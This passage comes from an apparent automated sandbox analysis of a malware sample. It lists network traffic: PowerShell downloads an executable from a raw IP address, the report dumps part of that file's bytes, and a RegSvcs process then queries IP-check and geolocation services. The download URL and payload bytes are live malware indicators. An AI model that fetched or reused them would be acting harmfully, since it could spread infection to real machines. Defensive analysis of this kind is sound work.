                                                                                  Mar 17, 2025 01:19:06.504245043 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504264116 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504276991 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504290104 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504291058 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504317045 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504327059 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504338980 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504344940 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504344940 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504350901 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504363060 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504374027 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504375935 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504390001 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504400969 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504420996 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504446983 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504462957 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504475117 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504486084 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504497051 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504503012 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504508018 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504518986 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504522085 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504532099 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504544973 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504575014 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504579067 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504585981 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504597902 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504611969 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504615068 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504623890 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504642963 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504652023 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504654884 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504666090 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504678011 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504688025 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504693985 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504708052 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504725933 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504728079 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504740000 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504751921 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504753113 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504764080 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504771948 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504780054 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504801035 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504812002 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504812956 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504822969 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504837036 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.504847050 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504865885 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.504877090 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505016088 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505031109 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505043030 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505054951 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505058050 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505065918 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505076885 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505080938 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505088091 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505100012 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505114079 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505137920 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505187035 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505202055 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505218983 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505229950 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505234957 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505242109 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505254030 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505265951 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.505270958 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505307913 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.505321980 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.591480017 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591509104 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591520071 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591532946 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591547012 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591566086 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591571093 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.591578007 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591593981 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591607094 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591624022 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591631889 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.591655016 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.591675043 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.591682911 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591695070 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591706991 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:06.591730118 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:06.591742039 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:10.709992886 CET804969523.95.235.28192.168.2.6
                                                                                  Mar 17, 2025 01:19:10.710057974 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:11.584146976 CET4969680192.168.2.6158.101.44.242
                                                                                  Mar 17, 2025 01:19:11.590595007 CET8049696158.101.44.242192.168.2.6
                                                                                  Mar 17, 2025 01:19:11.590737104 CET4969680192.168.2.6158.101.44.242
                                                                                  Mar 17, 2025 01:19:11.590915918 CET4969680192.168.2.6158.101.44.242
                                                                                  Mar 17, 2025 01:19:11.597028971 CET8049696158.101.44.242192.168.2.6
                                                                                  Mar 17, 2025 01:19:12.189285040 CET8049696158.101.44.242192.168.2.6
                                                                                  Mar 17, 2025 01:19:12.206897974 CET4969680192.168.2.6158.101.44.242
                                                                                  Mar 17, 2025 01:19:12.211549044 CET8049696158.101.44.242192.168.2.6
                                                                                  Mar 17, 2025 01:19:12.383248091 CET8049696158.101.44.242192.168.2.6
                                                                                  Mar 17, 2025 01:19:12.426209927 CET4969680192.168.2.6158.101.44.242
                                                                                  Mar 17, 2025 01:19:12.641896963 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:12.641941071 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:12.642015934 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:12.651971102 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:12.651992083 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:13.121772051 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:13.121854067 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:13.128077984 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:13.128087044 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:13.128408909 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:13.176191092 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:13.266833067 CET4969580192.168.2.623.95.235.28
                                                                                  Mar 17, 2025 01:19:13.274696112 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:13.320327997 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:13.386898041 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:13.386981010 CET44349697104.21.48.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:13.387038946 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:19:13.394593000 CET49697443192.168.2.6104.21.48.1
                                                                                  Mar 17, 2025 01:20:17.386197090 CET8049696158.101.44.242192.168.2.6
                                                                                  Mar 17, 2025 01:20:17.386292934 CET4969680192.168.2.6158.101.44.242
                                                                                  Mar 17, 2025 01:20:52.395384073 CET4969680192.168.2.6158.101.44.242
                                                                                  Mar 17, 2025 01:20:52.400165081 CET8049696158.101.44.242192.168.2.6

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Mar 17, 2025 01:19:11.569528103 CET5549753192.168.2.61.1.1.1
                                                                                  Mar 17, 2025 01:19:11.578458071 CET53554971.1.1.1192.168.2.6
                                                                                  Mar 17, 2025 01:19:12.628690004 CET6102253192.168.2.61.1.1.1
                                                                                  Mar 17, 2025 01:19:12.637061119 CET53610221.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Mar 17, 2025 01:19:11.569528103 CET192.168.2.61.1.1.10xe13dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.628690004 CET192.168.2.61.1.1.10x7f9fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Mar 17, 2025 01:19:11.578458071 CET1.1.1.1192.168.2.60xe13dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:11.578458071 CET1.1.1.1192.168.2.60xe13dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:11.578458071 CET1.1.1.1192.168.2.60xe13dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:11.578458071 CET1.1.1.1192.168.2.60xe13dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:11.578458071 CET1.1.1.1192.168.2.60xe13dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:11.578458071 CET1.1.1.1192.168.2.60xe13dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.637061119 CET1.1.1.1192.168.2.60x7f9fNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.637061119 CET1.1.1.1192.168.2.60x7f9fNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.637061119 CET1.1.1.1192.168.2.60x7f9fNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.637061119 CET1.1.1.1192.168.2.60x7f9fNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.637061119 CET1.1.1.1192.168.2.60x7f9fNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.637061119 CET1.1.1.1192.168.2.60x7f9fNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                  Mar 17, 2025 01:19:12.637061119 CET1.1.1.1192.168.2.60x7f9fNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • reallyfreegeoip.org
                                                                                  • 23.95.235.28
                                                                                  • checkip.dyndns.org

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.64969523.95.235.28805308C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 17, 2025 01:19:05.211270094 CET285OUTGET /120/csoss.exe HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                  Host: 23.95.235.28
                                                                                  Connection: Keep-Alive
                                                                                  Mar 17, 2025 01:19:05.706269026 CET1236INHTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:04 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Thu, 13 Mar 2025 12:29:25 GMT
                                                                                  ETag: "ef800-6303878f4d6d6"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 980992
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-msdownload
                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 cf d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 16 06 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELyg"}@`@@@L|poq+pH@.text `.rdata@@.datatR@.rsrcopp@@.relocqr@B
                                                                                  Mar 17, 2025 01:19:05.706298113 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQ
                                                                                  Mar 17, 2025 01:19:05.706309080 CET1236INData Raw: 00 68 7d b5 43 00 e8 ca 1c 02 00 59 c3 a1 10 53 4c 00 51 8b 40 04 05 10 53 4c 00 50 e8 ff 5f 00 00 68 92 b5 43 00 e8 aa 1c 02 00 59 c3 e8 05 31 00 00 68 97 b5 43 00 e8 99 1c 02 00 59 c3 e8 e6 73 00 00 68 9c b5 43 00 e8 88 1c 02 00 59 c3 e8 67 4c
                                                                                  Data Ascii: h}CYSLQ@SLP_hCY1hCYshCYgLhCwYdLehCaYSVWj[lGKyNlGN(GVY_^[SV3Wj_NN(^^~^^^ ^$ef^8
                                                                                  Mar 17, 2025 01:19:05.706320047 CET1236INData Raw: db 43 c7 45 fc fe ff ff ff 57 89 5d f0 ff 15 28 f1 48 00 8b 75 0c 88 1d 6c 58 4c 00 eb 6f ff 75 f0 33 db 53 ff 75 fc ff 75 f8 57 e8 84 fd ff ff 39 5e 0c 7e 34 8b ce 8d 86 10 08 00 00 8d 56 10 89 45 f4 f7 d9 89 55 0c 89 4d 08 80 38 08 73 53 83 c2
                                                                                  Data Ascii: CEW](HulXLou3SuuW9^~4VEUM8sS@EU;FE|F;t+PPCPW$HvuuW_^[];t +QPCPW$HEUMtDuLMtuW
                                                                                  Mar 17, 2025 01:19:05.706334114 CET1236INData Raw: b7 9f 03 00 8b d0 81 ea 33 01 00 00 0f 84 08 01 00 00 4a 0f 84 fa 00 00 00 4a 0f 84 9b 9f 03 00 4a 75 c0 56 b9 b0 57 4c 00 e8 d1 0b 00 00 8b 0d 10 58 4c 00 6a 0f 8b 04 81 8b 30 ff 15 28 f5 48 00 83 7e 4c ff 8b f8 74 03 8b 7e 4c 57 53 ff 15 40 f1
                                                                                  Data Ascii: 3JJJuVWLXLj0(H~Lt~LWS@HjWaNE+(IIIDjUuuR+t#I4Iu-V&SVPWPV
                                                                                  Mar 17, 2025 01:19:05.706346989 CET1236INData Raw: 60 75 18 84 c9 0f 88 8f 9c 03 00 8b 45 0c 99 2b c2 d1 f8 3b f0 0f 8f 9d 9c 03 00 8b 55 08 8b c1 83 e0 02 0f 85 b3 9c 03 00 f6 c1 04 0f 85 b6 9c 03 00 8b c1 83 e0 20 0f 85 ed 9c 03 00 f6 c1 40 0f 85 f0 9c 03 00 5f 5e 5b 8b e5 5d c2 0c 00 8b 7d 0c
                                                                                  Data Ascii: `uE+;U @_^[]}fFXffF\ft_fF`ffFdfEP74H9^Xt=9^\tEEP7H9^`A9^dJ{8}tfEffEfU
                                                                                  Mar 17, 2025 01:19:05.706358910 CET1236INData Raw: 9b 03 00 83 7d 0c 00 74 06 89 87 7c 01 00 00 3b b7 80 01 00 00 0f 85 44 9c 03 00 83 7d 0c 00 74 06 89 b7 80 01 00 00 5f 5e 5b 8b e5 5d c2 08 00 83 7d 0c 01 89 8f 74 01 00 00 89 87 78 01 00 00 7c 93 e9 9b 9b 03 00 55 8b ec 8b d1 8b 4d 08 56 57 85
                                                                                  Data Ascii: }t|;D}t_^[]}tx|UMVW-|P;HBtt<u@MB`8t"|;Bt8t_^]2UVW};FttQeFt ;u?
                                                                                  Mar 17, 2025 01:19:05.706370115 CET1236INData Raw: 45 0c 89 45 0c 83 7d 14 ff b9 90 01 00 00 0f 84 a8 01 00 00 83 7d 18 ff 0f 84 a6 01 00 00 83 f8 ff 75 2d 6a 00 8d 45 e8 50 6a 00 6a 30 ff 15 40 f7 48 00 6a 07 ff 15 58 f5 48 00 8b 4d e8 2b 4d 14 03 4d f0 2b c8 8b c1 99 2b c2 d1 f8 89 45 0c 83 7d
                                                                                  Data Ascii: EE}}u-jEPjj0@HjXHM+MM++E} uFjEPjj0@HjXHM+MM++E @tjXHjYE uEujjPHuEjSPHE+Ej5XLju$PE+EPu uSuhHu H
                                                                                  Mar 17, 2025 01:19:05.706381083 CET1236INData Raw: 8b 04 b0 8b 18 53 89 5d e4 e8 a8 f7 ff ff 8b f8 89 7d e0 83 ff ff 0f 84 66 01 00 00 a1 24 58 4c 00 8b 55 08 8b 04 b8 8b 30 89 75 dc 83 fa 0e 0f 84 f8 9b 03 00 83 fa 0f 0f 84 ef 9b 03 00 83 fa 0c 0f 84 e6 9b 03 00 c6 86 92 00 00 00 50 66 a1 b8 57
                                                                                  Data Ascii: S]}f$XLU0uPfWLfUEM}UU(EM}USuWQP{`CXK\}{dEM}U}E$.@u$u uuuuWVSUXM(
                                                                                  Mar 17, 2025 01:19:05.706392050 CET108INData Raw: 1d 8b d1 0f b6 c1 c1 fa 10 81 e1 00 ff 00 00 81 e2 ff 00 00 00 c1 e0 10 0b d0 0b d1 89 16 5e c3 55 8b ec 56 8b f1 57 33 ff 6a 0c 39 7e 04 74 2e e8 4a db 01 00 59 85 c0 74 0c ff 75 08 8b c8 e8 4c 00 00 00 8b f8 8b 46 04 89 47 08 8b 46 04 89 78 04
                                                                                  Data Ascii: ^UVW3j9~t.JYtuLFGFxF~_^]Ytu
                                                                                  Mar 17, 2025 01:19:05.711080074 CET1236INData Raw: c8 e8 1e 00 00 00 8b f8 89 3e eb da 56 8b f1 ff 36 e8 73 db 01 00 56 e8 6d db 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 6a 0c 83 63 04 00 83 63 08 00 e8 da da 01 00 59 85 c0 74 15 56 8b 75 08 57 8b f8 a5 a5 a5 5f 5e 89 03 8b c3 5b 5d c2 04
                                                                                  Data Ascii: >V6sVmYY^USjccYtVuW_^[]3VWNxuYF|~tNSHH1fpNTF|%N$%N%VY_^QyFfxNptQ]YSV3WN~^^^


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649696158.101.44.242805484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 17, 2025 01:19:11.590915918 CET151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Mar 17, 2025 01:19:12.189285040 CET321INHTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 104
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 94931f85050f398876f1bad94c2a121b
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                  Mar 17, 2025 01:19:12.206897974 CET127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Mar 17, 2025 01:19:12.383248091 CET321INHTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 104
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 6a36991c3ed2dde0375a8a7b4549c8c9
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649697104.21.48.14435484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-17 00:19:13 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                  Host: reallyfreegeoip.org
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-17 00:19:13 UTC861INHTTP/1.1 200 OK
                                                                                  Date: Mon, 17 Mar 2025 00:19:13 GMT
                                                                                  Content-Type: text/xml
                                                                                  Content-Length: 362
                                                                                  Connection: close
                                                                                  Cf-Ray: 921851484ef25f83-EWR
                                                                                  Server: cloudflare
                                                                                  Age: 21780
                                                                                  Cache-Control: max-age=31536000
                                                                                  Cf-Cache-Status: HIT
                                                                                  Last-Modified: Sun, 16 Mar 2025 18:16:12 GMT
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Af%2Fnd9oUKA48%2FwNjBGFdTmqVmzUOenGnXUjga9%2BxqqIkxDRdZQoZDZRX30IKRGOqcUspYqIGooRy%2B7hv%2Fsba5XGBkTrR0QDJvXqSMcmjDqmUA9qNxPSi9s%2F%2Bik5tjHuBrg6dcuqH"}],"group":"cf-nel","max_age":604800}
                                                                                  Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2052&rtt_var=771&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1418853&cwnd=131&unsent_bytes=0&cid=47c76c35a9d42d39&ts=275&x=0"
